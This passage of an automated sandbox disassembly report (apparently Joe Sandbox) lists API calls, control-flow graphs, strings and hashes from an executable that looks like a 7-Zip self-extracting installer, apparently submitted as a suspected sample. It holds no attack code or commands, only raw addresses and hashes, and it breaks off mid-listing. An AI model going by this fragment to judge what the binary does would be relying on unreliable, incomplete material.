                                                    • wsprintfW.USER32 ref: 00405D2A
                                                      • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                    • GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E
                                                      • Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                      • Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                      • Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D
                                                    • _wtol.MSVCRT ref: 00405F6B
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
                                                    • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
                                                    • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
                                                    • CoInitialize.OLE32(00000000), ref: 004062F2
                                                    • _wtol.MSVCRT ref: 00406338
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
                                                    • GetKeyState.USER32(00000010), ref: 004063BE
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
                                                    • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
                                                    • _wtol.MSVCRT ref: 0040686C
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53
                                                      • Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
                                                      • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                      • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77
                                                      • Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                      • Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253
                                                      • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
                                                      • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50
                                                      • Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
                                                    • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
                                                    • String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86
                                                    • API String ID: 1141480454-1804565692
                                                    • Opcode ID: 70599bd1909c1660afbe8675f911dde0ba5a546dff0894423a23835351c4fce5
                                                    • Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
                                                    • Opcode Fuzzy Hash: 70599bd1909c1660afbe8675f911dde0ba5a546dff0894423a23835351c4fce5
                                                    • Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 724 401815-401825 725 401831-40185c call 401132 call 41017a 724->725 726 401827-40182c 724->726 731 40185e 725->731 732 40186f-40187b call 401458 725->732 727 401b6f-401b72 726->727 734 401860-40186a call 40cb68 731->734 738 401b51-401b6c ??3@YAXPAX@Z call 40cb68 732->738 739 401881-401886 732->739 740 401b6e 734->740 738->740 739->738 741 40188c-4018c2 call 401370 call 401551 call 4013a9 ??3@YAXPAX@Z 739->741 740->727 751 401b37-401b3a 741->751 752 4018c8-4018e7 741->752 753 401b3c-401b4f ??3@YAXPAX@Z call 40cb68 751->753 757 401902-401906 752->757 758 4018e9-4018fd call 40cb68 ??3@YAXPAX@Z 752->758 753->740 760 401908-40190b 757->760 761 40190d-401912 757->761 758->734 763 40193a-401951 760->763 764 401934-401937 761->764 765 401914 761->765 763->758 768 401953-401976 763->768 764->763 766 401916-40191c 765->766 770 40191e-40192f call 40cb68 ??3@YAXPAX@Z 766->770 773 401991-401997 768->773 774 401978-40198c call 40cb68 ??3@YAXPAX@Z 768->774 770->734 777 4019b3-4019c5 GetLocalTime SystemTimeToFileTime 773->777 778 401999-40199c 773->778 774->734 782 4019cb-4019ce 777->782 780 4019a5-4019b1 778->780 781 40199e-4019a0 778->781 780->782 781->766 783 4019d0-4019da call 4036f1 782->783 784 4019e7-4019ee call 403387 782->784 783->770 791 4019e0-4019e2 783->791 787 4019f3-4019f8 784->787 789 401b23-401b32 GetLastError 787->789 790 4019fe-401a01 787->790 789->751 792 401a07-401a11 ??2@YAPAXI@Z 790->792 793 401b19-401b1c 790->793 791->766 794 401a22 792->794 795 401a13-401a20 792->795 793->789 797 401a24-401a48 call 40ef4a call 40ca5c 794->797 795->797 802 401afe-401b17 call 40f707 call 40cb68 797->802 803 401a4e-401a6c GetLastError call 40133e call 4030c7 797->803 802->753 812 401aa9-401abe call 4036f1 803->812 813 401a6e-401a75 803->813 819 401ac0-401ac8 812->819 820 401aca-401ae2 call 40ca5c 812->820 815 401a79-401a89 ??3@YAXPAX@Z 813->815 817 401a91-401aa4 call 40cb68 ??3@YAXPAX@Z 815->817 818 401a8b-401a8d 815->818 817->734 818->817 819->815 826 401ae4-401af3 GetLastError 820->826 827 401af5-401afd ??3@YAXPAX@Z 820->827 826->815 827->802
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c73201a278f1b3fb0192b37316eaaccfca94a9c717224a51945d29c04819a4bf
                                                    • Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
                                                    • Opcode Fuzzy Hash: c73201a278f1b3fb0192b37316eaaccfca94a9c717224a51945d29c04819a4bf
                                                    • Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1049 40236f-40238e LoadLibraryA GetProcAddress 1050 402390-40239b GetNativeSystemInfo 1049->1050 1051 40239c-40239f 1049->1051
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                    • String ID: GetNativeSystemInfo$kernel32
                                                    • API String ID: 2103483237-3846845290
                                                    • Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                    • Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
                                                    • Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                    • Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1260 403387-40339e GetFileAttributesW 1261 4033a0-4033a2 1260->1261 1262 4033a4-4033a6 1260->1262 1263 4033fd-4033ff 1261->1263 1264 4033b5-4033bc 1262->1264 1265 4033a8-4033b3 SetLastError 1262->1265 1266 4033c7-4033ca 1264->1266 1267 4033be-4033c5 call 40335a 1264->1267 1265->1263 1268 4033fa-4033fc 1266->1268 1269 4033cc-4033dd FindFirstFileW 1266->1269 1267->1263 1268->1263 1269->1267 1271 4033df-4033f8 FindClose CompareFileTime 1269->1271 1271->1267 1271->1268
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
                                                    • SetLastError.KERNEL32(00000010), ref: 004033AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 1799206407-0
                                                    • Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                    • Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
                                                    • Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                    • Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D
                                                    APIs
                                                    • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
                                                    • SendMessageW.USER32(00008001,00000000,?), ref: 00401246
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: DiskFreeMessageSendSpace
                                                    • String ID:
                                                    • API String ID: 696007252-0
                                                    • Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                    • Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
                                                    • Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                    • Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 830 404f67-404fac call 401458 * 2 memset 835 404fb8-404fbc 830->835 836 404fae-404fb1 830->836 837 404fc5-404fdf call 404a97 call 401370 835->837 838 404fbe 835->838 836->835 843 404fe1-404fe9 ??3@YAXPAX@Z 837->843 844 404ffa-405012 ShellExecuteExW 837->844 838->837 845 404fec-404ff9 ??3@YAXPAX@Z 843->845 846 405014-40501b 844->846 847 40503a-40503c 844->847 848 405028-40502b CloseHandle 846->848 849 40501d-405022 WaitForSingleObject 846->849 850 405031-405038 ??3@YAXPAX@Z 847->850 848->850 849->848 850->845
                                                    APIs
                                                    • memset.MSVCRT ref: 00404F8B
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                    • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                    • ShellExecuteExW.SHELL32(?), ref: 0040500A
                                                    • WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
                                                    • CloseHandle.KERNEL32(00406A69), ref: 0040502B
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405032
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                    • String ID: $gA
                                                    • API String ID: 2700081640-3949116232
                                                    • Opcode ID: af380bbf304387a9167cbd1d4d1862e6770bcacde50da9e8c22bf20be027a6a5
                                                    • Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
                                                    • Opcode Fuzzy Hash: af380bbf304387a9167cbd1d4d1862e6770bcacde50da9e8c22bf20be027a6a5
                                                    • Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                    • CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                    • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                    • DispatchMessageW.USER32(?), ref: 00401D73
                                                    • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                    • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                    • String ID: Static
                                                    • API String ID: 2479445380-2272013587
                                                    • Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                    • Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
                                                    • Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                    • Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 854 4036f1-403717 lstrlenW call 402771 857 403722-40372e 854->857 858 403719-40371d call 401172 854->858 860 403730-403734 857->860 861 403736-40373c 857->861 858->857 860->861 862 40373f-403741 860->862 861->862 863 403765-40376e call 401b75 862->863 866 403770-403783 GetSystemTimeAsFileTime GetFileAttributesW 863->866 867 403754-403756 863->867 870 403785-403793 call 403387 866->870 871 40379c-4037a5 call 401b75 866->871 868 403743-40374b 867->868 869 403758-40375a 867->869 868->869 876 40374d-403751 868->876 872 403760 869->872 873 403814-40381a 869->873 870->871 884 403795-403797 870->884 885 4037b6-4037b8 871->885 886 4037a7-4037b4 call 408dbf 871->886 872->863 880 403844-403857 call 408dbf ??3@YAXPAX@Z 873->880 881 40381c-403827 873->881 876->869 877 403753 876->877 877->867 897 403859-40385d 880->897 881->880 882 403829-40382d 881->882 882->880 888 40382f-403834 882->888 892 403839-403842 ??3@YAXPAX@Z 884->892 889 403808-403812 ??3@YAXPAX@Z 885->889 890 4037ba-4037d9 memcpy 885->890 886->884 888->880 894 403836-403838 888->894 889->897 895 4037db 890->895 896 4037ee-4037f2 890->896 892->897 894->892 898 4037ed 895->898 899 4037f4-403801 call 401b75 896->899 900 4037dd-4037e5 896->900 898->896 899->886 904 403803-403806 899->904 900->899 901 4037e7-4037eb 900->901 901->898 901->899 904->889 904->890
                                                    APIs
                                                    • lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                    • GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                    • ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                      • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                      • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                    • memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                    • String ID:
                                                    • API String ID: 846840743-0
                                                    • Opcode ID: 56e83d9032eb4557e1cbfa7845c089d1cc7cb79c4288f6695d96d71fac981e1d
                                                    • Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
                                                    • Opcode Fuzzy Hash: 56e83d9032eb4557e1cbfa7845c089d1cc7cb79c4288f6695d96d71fac981e1d
                                                    • Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 905 40f227-40f26f _EH_prolog call 40ef4a 908 40f271-40f274 905->908 909 40f277-40f27a 905->909 908->909 910 40f290-40f2b5 909->910 911 40f27c-40f281 909->911 914 40f2b7-40f2bd 910->914 912 40f283-40f285 911->912 913 40f289-40f28b 911->913 912->913 915 40f6f3-40f704 913->915 916 40f2c3-40f2c7 914->916 917 40f387-40f39a call 4011d1 914->917 918 40f2c9-40f2cc 916->918 919 40f2cf-40f2de 916->919 925 40f3b1-40f3d6 call 40e891 ??2@YAPAXI@Z 917->925 926 40f39c-40f3a6 call 40ef85 917->926 918->919 921 40f2e0-40f2f6 call 40f040 call 40f1fd call 40ce5c 919->921 922 40f303-40f308 919->922 942 40f2fb-40f301 921->942 923 40f316-40f350 call 40f040 call 40f1fd call 40ce5c call 40f117 922->923 924 40f30a-40f314 922->924 928 40f353-40f369 923->928 924->923 924->928 939 40f3e1-40f3fa call 40ef4a call 40dc14 925->939 940 40f3d8-40f3df call 40dce7 925->940 948 40f3aa-40f3ac 926->948 936 40f36c-40f374 928->936 941 40f376-40f385 call 40ef63 936->941 936->942 958 40f3fd-40f420 call 40dc09 939->958 940->939 941->936 942->914 948->915 962 40f422-40f427 958->962 963 40f456-40f459 958->963 966 40f429-40f42b 962->966 967 40f42f-40f447 call 40f090 call 40ef85 962->967 964 40f485-40f4a9 